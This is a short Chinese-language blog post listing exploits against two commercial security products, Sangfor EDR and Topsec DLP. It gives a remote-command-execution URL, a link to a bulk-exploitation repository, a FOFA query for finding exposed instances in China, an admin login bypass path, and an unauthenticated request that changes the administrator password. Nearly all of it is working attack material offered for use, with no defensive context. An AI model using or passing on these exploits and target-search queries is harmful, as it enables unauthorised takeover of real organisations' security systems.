深信服EDR

RCE:

https://xxx.xxx.xxx:9443/tool/log/c.php?strip_slashes=system&host=whoami

批量github:https://github.com/A2gel/sangfor-edr-exploit

fofa:title="终端检测响应平台" && country="CN"

任意用户登录:

/ui/login.php?user=admin



天融信DLP


最新版本V3.1130.308ps3_DLP.1 未授权访问导致越权修改管理员密码


  1. POST /?module=auth_user&action=mod_edit_pwd HTTP/1.1

  2. Host:xxxx

  3. 剩下的一些参数省略.... ...

  4. uid=1&pd=Tftp@dlp108&mod_pwd=1&dlp_perm=1

image.png


uid=1&pd=Tftp@dlp108&mod_pwd=1&dlp_perm=1



赞 (1)
本文由 Aatrox 创作,采用 知识共享署名 3.0,可自由转载、引用,但需署名作者且注明文章出处。

还不快抢沙发

添加新评论